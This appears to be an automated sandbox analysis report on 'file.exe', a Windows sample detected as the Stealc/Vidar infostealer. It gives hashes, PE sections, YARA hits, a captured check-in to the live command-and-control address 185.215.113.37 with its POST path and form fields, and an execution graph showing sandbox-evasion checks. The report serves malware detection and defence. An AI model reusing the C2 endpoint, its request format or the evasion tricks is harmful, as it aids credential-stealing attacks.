                Number of new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 83
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • VT rate limit hit for: file.exe
                                No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.37 | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37/e2b1563c6670f193.php
                                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                | file.exe | | malicious | Stealc | | 185.215.113.37
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                | file.exe | | malicious | Stealc | | 185.215.113.37
                | file.exe | | malicious | Stealc | | 185.215.113.37
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                | file.exe | | malicious | Stealc | | 185.215.113.37
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                | file.exe | | malicious | Stealc, Vidar | | 185.215.113.37
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.948276417564053
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'841'152 bytes
                                MD5:2b6a17cf5d76f7664806991d7619e998
                                SHA1:b32948270dcb41941e0f98122f9c9d48a36c199c
                                SHA256:beb033b6b81e60ed419ba19985a2c7d1ffb6a4bcadf151e4686404079e0c7747
                                SHA512:ce8038b52f4ac00fc86b7f26627f8ce1d5d76e59c81003a0362b3a491ee2a7735a4eedda7cc4541ee1ae6e3b13e6159cd16b3d25c200fec3daaf4f6fb44d19d7
                                SSDEEP:24576:cLdBGtGG1W4UNJXbn4hHdXkoPPdYTngYY/Liz54HHX+kfy0gHOFTXVPZvC6GOgGt:iGjUL2yA2TzURfLgHOFTXBZ6ygG30n
                                TLSH:5C8533763D27536DF1570438A4BF4D286071789168FDD7390B4EE286032FF39AAA84B9
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xa9d000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F91A0B7EF8Ah
                                psadbw mm3, qword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edx], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                (no name) | 0x1000 | 0x25b000 | 0x22800 | d7e07e21339300028c84d656894f3be9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                (no name) | 0x25e000 | 0x2a2000 | 0x200 | e03ca60aa1308976a62da248482959ff | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                rjfivtba | 0x500000 | 0x19c000 | 0x19b600 | 9fd570f265ca46425e8f17842abc9a63 | False | 0.9950053175326649 | data | 7.953820033334295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                iwmizbgs | 0x69c000 | 0x1000 | 0x400 | 0bf2f6901a6fde6313b81d77142d7903 | False | 0.7978515625 | data | 6.103846877771363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x69d000 | 0x3000 | 0x2200 | 1cf78f1291e7537f5bb13633162a4e50 | False | 0.07146139705882353 | DOS executable (COM) | 0.7704688160324733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLL | Import
                                kernel32.dll | lstrcpy
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-10-01T15:22:01.059735+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 1, 2024 15:21:59.953063011 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:21:59.957982063 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                                Oct 1, 2024 15:21:59.958173037 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:21:59.958805084 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:21:59.964143991 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                                Oct 1, 2024 15:22:00.649069071 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                                Oct 1, 2024 15:22:00.649149895 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:22:00.653525114 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:22:00.658286095 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                                Oct 1, 2024 15:22:01.059619904 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                                Oct 1, 2024 15:22:01.059735060 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                Oct 1, 2024 15:22:04.634743929 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                                • 185.215.113.37
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | 1656 | C:\Users\user\Desktop\file.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 1, 2024 15:21:59.958805084 CEST | 89 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 1, 2024 15:22:00.649069071 CEST | 203 | IN | HTTP/1.1 200 OK
                                Date: Tue, 01 Oct 2024 13:22:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 1, 2024 15:22:00.653525114 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a
                                Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="hwid"774093E1285A1361495298------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="build"doma------AFBAFBKEGCFBGCBFIDAK--
                                Oct 1, 2024 15:22:01.059619904 CEST | 210 | IN | HTTP/1.1 200 OK
                                Date: Tue, 01 Oct 2024 13:22:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Target ID:0
                                Start time:09:21:55
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x230000
                                File size:1'841'152 bytes
                                MD5 hash:2B6A17CF5D76F7664806991D7619E998
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:8.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13482 2469f0 13527 232260 13482->13527 13506 246a64 13507 24a9b0 4 API calls 13506->13507 13508 246a6b 13507->13508 13509 24a9b0 4 API calls 13508->13509 13510 246a72 13509->13510 13511 24a9b0 4 API calls 13510->13511 13512 246a79 13511->13512 13513 24a9b0 4 API calls 13512->13513 13514 246a80 13513->13514 13679 24a8a0 13514->13679 13516 246b0c 13683 246920 GetSystemTime 13516->13683 13517 246a89 13517->13516 13520 246ac2 OpenEventA 13517->13520 13522 246af5 CloseHandle Sleep 13520->13522 13523 246ad9 13520->13523 13524 246b0a 13522->13524 13526 246ae1 CreateEventA 13523->13526 13524->13517 13526->13516 13880 2345c0 13527->13880 13529 232274 13530 2345c0 2 API calls 13529->13530 13531 23228d 13530->13531 13532 2345c0 2 API calls 13531->13532 13533 2322a6 13532->13533 13534 2345c0 2 API calls 13533->13534 13535 2322bf 13534->13535 13536 2345c0 2 API calls 13535->13536 13537 2322d8 13536->13537 13538 2345c0 2 API calls 13537->13538 13539 2322f1 13538->13539 13540 2345c0 2 API calls 13539->13540 13541 23230a 13540->13541 13542 2345c0 2 API calls 13541->13542 13543 232323 13542->13543 13544 2345c0 2 API calls 13543->13544 13545 23233c 13544->13545 13546 2345c0 2 API calls 13545->13546 13547 232355 13546->13547 13548 2345c0 2 API calls 13547->13548 13549 23236e 13548->13549 13550 2345c0 2 API calls 13549->13550 13551 232387 13550->13551 13552 2345c0 2 API calls 13551->13552 13553 2323a0 13552->13553 13554 2345c0 2 API calls 13553->13554 13555 2323b9 13554->13555 13556 2345c0 2 API calls 13555->13556 13557 2323d2 13556->13557 13558 2345c0 2 API calls 13557->13558 13559 2323eb 13558->13559 13560 2345c0 2 API calls 13559->13560 13561 232404 13560->13561 13562 2345c0 2 API calls 13561->13562 13563 23241d 13562->13563 13564 2345c0 2 API calls 13563->13564 13565 232436 13564->13565 13566 2345c0 2 API calls 13565->13566 13567 23244f 13566->13567 13568 2345c0 2 API calls 13567->13568 13569 232468 13568->13569 13570 2345c0 2 API 
calls 13569->13570 13571 232481 13570->13571 13572 2345c0 2 API calls 13571->13572 13573 23249a 13572->13573 13574 2345c0 2 API calls 13573->13574 13575 2324b3 13574->13575 13576 2345c0 2 API calls 13575->13576 13577 2324cc 13576->13577 13578 2345c0 2 API calls 13577->13578 13579 2324e5 13578->13579 13580 2345c0 2 API calls 13579->13580 13581 2324fe 13580->13581 13582 2345c0 2 API calls 13581->13582 13583 232517 13582->13583 13584 2345c0 2 API calls 13583->13584 13585 232530 13584->13585 13586 2345c0 2 API calls 13585->13586 13587 232549 13586->13587 13588 2345c0 2 API calls 13587->13588 13589 232562 13588->13589 13590 2345c0 2 API calls 13589->13590 13591 23257b 13590->13591 13592 2345c0 2 API calls 13591->13592 13593 232594 13592->13593 13594 2345c0 2 API calls 13593->13594 13595 2325ad 13594->13595 13596 2345c0 2 API calls 13595->13596 13597 2325c6 13596->13597 13598 2345c0 2 API calls 13597->13598 13599 2325df 13598->13599 13600 2345c0 2 API calls 13599->13600 13601 2325f8 13600->13601 13602 2345c0 2 API calls 13601->13602 13603 232611 13602->13603 13604 2345c0 2 API calls 13603->13604 13605 23262a 13604->13605 13606 2345c0 2 API calls 13605->13606 13607 232643 13606->13607 13608 2345c0 2 API calls 13607->13608 13609 23265c 13608->13609 13610 2345c0 2 API calls 13609->13610 13611 232675 13610->13611 13612 2345c0 2 API calls 13611->13612 13613 23268e 13612->13613 13614 249860 13613->13614 13885 249750 GetPEB 13614->13885 13616 249868 13617 249a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13616->13617 13618 24987a 13616->13618 13619 249af4 GetProcAddress 13617->13619 13620 249b0d 13617->13620 13623 24988c 21 API calls 13618->13623 13619->13620 13621 249b46 13620->13621 13622 249b16 GetProcAddress GetProcAddress 13620->13622 13624 249b4f GetProcAddress 13621->13624 13625 249b68 13621->13625 13622->13621 13623->13617 13624->13625 13626 249b71 GetProcAddress 13625->13626 13627 249b89 13625->13627 13626->13627 13628 246a00 13627->13628 13629 
249b92 GetProcAddress GetProcAddress 13627->13629 13630 24a740 13628->13630 13629->13628 13631 24a750 13630->13631 13632 246a0d 13631->13632 13633 24a77e lstrcpy 13631->13633 13634 2311d0 13632->13634 13633->13632 13635 2311e8 13634->13635 13636 231217 13635->13636 13637 23120f ExitProcess 13635->13637 13638 231160 GetSystemInfo 13636->13638 13639 231184 13638->13639 13640 23117c ExitProcess 13638->13640 13641 231110 GetCurrentProcess VirtualAllocExNuma 13639->13641 13642 231141 ExitProcess 13641->13642 13643 231149 13641->13643 13886 2310a0 VirtualAlloc 13643->13886 13646 231220 13890 2489b0 13646->13890 13649 231249 13650 23129a 13649->13650 13651 231292 ExitProcess 13649->13651 13652 246770 GetUserDefaultLangID 13650->13652 13653 246792 13652->13653 13654 2467d3 13652->13654 13653->13654 13655 2467b7 ExitProcess 13653->13655 13656 2467c1 ExitProcess 13653->13656 13657 2467a3 ExitProcess 13653->13657 13658 2467ad ExitProcess 13653->13658 13659 2467cb ExitProcess 13653->13659 13660 231190 13654->13660 13661 2478e0 3 API calls 13660->13661 13662 23119e 13661->13662 13663 2311cc 13662->13663 13664 247850 3 API calls 13662->13664 13667 247850 GetProcessHeap RtlAllocateHeap GetUserNameA 13663->13667 13665 2311b7 13664->13665 13665->13663 13666 2311c4 ExitProcess 13665->13666 13668 246a30 13667->13668 13669 2478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13668->13669 13670 246a43 13669->13670 13671 24a9b0 13670->13671 13892 24a710 13671->13892 13673 24a9c1 lstrlen 13675 24a9e0 13673->13675 13674 24aa18 13893 24a7a0 13674->13893 13675->13674 13677 24a9fa lstrcpy lstrcat 13675->13677 13677->13674 13678 24aa24 13678->13506 13680 24a8bb 13679->13680 13681 24a90b 13680->13681 13682 24a8f9 lstrcpy 13680->13682 13681->13517 13682->13681 13897 246820 13683->13897 13685 24698e 13686 246998 sscanf 13685->13686 13926 24a800 13686->13926 13688 2469aa SystemTimeToFileTime SystemTimeToFileTime 13689 2469e0 13688->13689 13690 2469ce 13688->13690 13692 245b10 13689->13692 
13690->13689 13691 2469d8 ExitProcess 13690->13691 13693 245b1d 13692->13693 13694 24a740 lstrcpy 13693->13694 13695 245b2e 13694->13695 13928 24a820 lstrlen 13695->13928 13698 24a820 2 API calls 13699 245b64 13698->13699 13700 24a820 2 API calls 13699->13700 13701 245b74 13700->13701 13932 246430 13701->13932 13704 24a820 2 API calls 13705 245b93 13704->13705 13706 24a820 2 API calls 13705->13706 13707 245ba0 13706->13707 13708 24a820 2 API calls 13707->13708 13709 245bad 13708->13709 13710 24a820 2 API calls 13709->13710 13711 245bf9 13710->13711 13941 2326a0 13711->13941 13719 245cc3 13720 246430 lstrcpy 13719->13720 13721 245cd5 13720->13721 13722 24a7a0 lstrcpy 13721->13722 13723 245cf2 13722->13723 13724 24a9b0 4 API calls 13723->13724 13725 245d0a 13724->13725 13726 24a8a0 lstrcpy 13725->13726 13727 245d16 13726->13727 13728 24a9b0 4 API calls 13727->13728 13729 245d3a 13728->13729 13730 24a8a0 lstrcpy 13729->13730 13731 245d46 13730->13731 13732 24a9b0 4 API calls 13731->13732 13733 245d6a 13732->13733 13734 24a8a0 lstrcpy 13733->13734 13735 245d76 13734->13735 13736 24a740 lstrcpy 13735->13736 13737 245d9e 13736->13737 14667 247500 GetWindowsDirectoryA 13737->14667 13740 24a7a0 lstrcpy 13741 245db8 13740->13741 14677 234880 13741->14677 13743 245dbe 14822 2417a0 13743->14822 13745 245dc6 13746 24a740 lstrcpy 13745->13746 13747 245de9 13746->13747 13748 231590 lstrcpy 13747->13748 13749 245dfd 13748->13749 14838 235960 13749->14838 13751 245e03 14982 241050 13751->14982 13753 245e0e 13754 24a740 lstrcpy 13753->13754 13755 245e32 13754->13755 13756 231590 lstrcpy 13755->13756 13757 245e46 13756->13757 13758 235960 34 API calls 13757->13758 13759 245e4c 13758->13759 14986 240d90 13759->14986 13761 245e57 13762 24a740 lstrcpy 13761->13762 13763 245e79 13762->13763 13764 231590 lstrcpy 13763->13764 13765 245e8d 13764->13765 13766 235960 34 API calls 13765->13766 13767 245e93 13766->13767 14993 240f40 13767->14993 13769 245e9e 13770 231590 lstrcpy 13769->13770 
13771 245eb5 13770->13771 14998 241a10 13771->14998 13773 245eba 13774 24a740 lstrcpy 13773->13774 13775 245ed6 13774->13775 15342 234fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13775->15342 13777 245edb 13778 231590 lstrcpy 13777->13778 13779 245f5b 13778->13779 15349 240740 13779->15349 13781 245f60 13782 24a740 lstrcpy 13781->13782 13783 245f86 13782->13783 13784 231590 lstrcpy 13783->13784 13785 245f9a 13784->13785 13786 235960 34 API calls 13785->13786 13787 245fa0 13786->13787 13881 2345d1 RtlAllocateHeap 13880->13881 13883 234621 VirtualProtect 13881->13883 13883->13529 13885->13616 13888 2310c2 codecvt 13886->13888 13887 2310fd 13887->13646 13888->13887 13889 2310e2 VirtualFree 13888->13889 13889->13887 13891 231233 GlobalMemoryStatusEx 13890->13891 13891->13649 13892->13673 13894 24a7c2 13893->13894 13895 24a7ec 13894->13895 13896 24a7da lstrcpy 13894->13896 13895->13678 13896->13895 13898 24a740 lstrcpy 13897->13898 13899 246833 13898->13899 13900 24a9b0 4 API calls 13899->13900 13901 246845 13900->13901 13902 24a8a0 lstrcpy 13901->13902 13903 24684e 13902->13903 13904 24a9b0 4 API calls 13903->13904 13905 246867 13904->13905 13906 24a8a0 lstrcpy 13905->13906 13907 246870 13906->13907 13908 24a9b0 4 API calls 13907->13908 13909 24688a 13908->13909 13910 24a8a0 lstrcpy 13909->13910 13911 246893 13910->13911 13912 24a9b0 4 API calls 13911->13912 13913 2468ac 13912->13913 13914 24a8a0 lstrcpy 13913->13914 13915 2468b5 13914->13915 13916 24a9b0 4 API calls 13915->13916 13917 2468cf 13916->13917 13918 24a8a0 lstrcpy 13917->13918 13919 2468d8 13918->13919 13920 24a9b0 4 API calls 13919->13920 13921 2468f3 13920->13921 13922 24a8a0 lstrcpy 13921->13922 13923 2468fc 13922->13923 13924 24a7a0 lstrcpy 13923->13924 13925 246910 13924->13925 13925->13685 13927 24a812 13926->13927 13927->13688 13929 24a83f 13928->13929 13930 245b54 13929->13930 13931 24a87b lstrcpy 13929->13931 13930->13698 13931->13930 13933 24a8a0 lstrcpy 13932->13933 13934 246443 13933->13934 
13935 24a8a0 lstrcpy 13934->13935 13936 246455 13935->13936 13937 24a8a0 lstrcpy 13936->13937 13938 246467 13937->13938 13939 24a8a0 lstrcpy 13938->13939 13940 245b86 13939->13940 13940->13704 13942 2345c0 2 API calls 13941->13942 13943 2326b4 13942->13943 13944 2345c0 2 API calls 13943->13944 13945 2326d7 13944->13945 13946 2345c0 2 API calls 13945->13946 13947 2326f0 13946->13947 13948 2345c0 2 API calls 13947->13948 13949 232709 13948->13949 13950 2345c0 2 API calls 13949->13950 13951 232736 13950->13951 13952 2345c0 2 API calls 13951->13952 13953 23274f 13952->13953 13954 2345c0 2 API calls 13953->13954 13955 232768 13954->13955 13956 2345c0 2 API calls 13955->13956 13957 232795 13956->13957 13958 2345c0 2 API calls 13957->13958 13959 2327ae 13958->13959 13960 2345c0 2 API calls 13959->13960 13961 2327c7 13960->13961 13962 2345c0 2 API calls 13961->13962 13963 2327e0 13962->13963 13964 2345c0 2 API calls 13963->13964 13965 2327f9 13964->13965 13966 2345c0 2 API calls 13965->13966 13967 232812 13966->13967 13968 2345c0 2 API calls 13967->13968 13969 23282b 13968->13969 13970 2345c0 2 API calls 13969->13970 13971 232844 13970->13971 13972 2345c0 2 API calls 13971->13972 13973 23285d 13972->13973 13974 2345c0 2 API calls 13973->13974 13975 232876 13974->13975 13976 2345c0 2 API calls 13975->13976 13977 23288f 13976->13977 13978 2345c0 2 API calls 13977->13978 13979 2328a8 13978->13979 13980 2345c0 2 API calls 13979->13980 13981 2328c1 13980->13981 13982 2345c0 2 API calls 13981->13982 13983 2328da 13982->13983 13984 2345c0 2 API calls 13983->13984 13985 2328f3 13984->13985 13986 2345c0 2 API calls 13985->13986 13987 23290c 13986->13987 13988 2345c0 2 API calls 13987->13988 13989 232925 13988->13989 13990 2345c0 2 API calls 13989->13990 13991 23293e 13990->13991 13992 2345c0 2 API calls 13991->13992 13993 232957 13992->13993 13994 2345c0 2 API calls 13993->13994 13995 232970 13994->13995 13996 2345c0 2 API calls 13995->13996 13997 232989 13996->13997 13998 2345c0 2 
[Execution graph fragment: call-graph residue from the interactive graph view, condensed to the recoverable node addresses and API names.]

Chain 2329a2 .. 2345a9: a long linear sequence of blocks, each calling the function at 2345c0 (2 API calls per call), ending at 249c10.
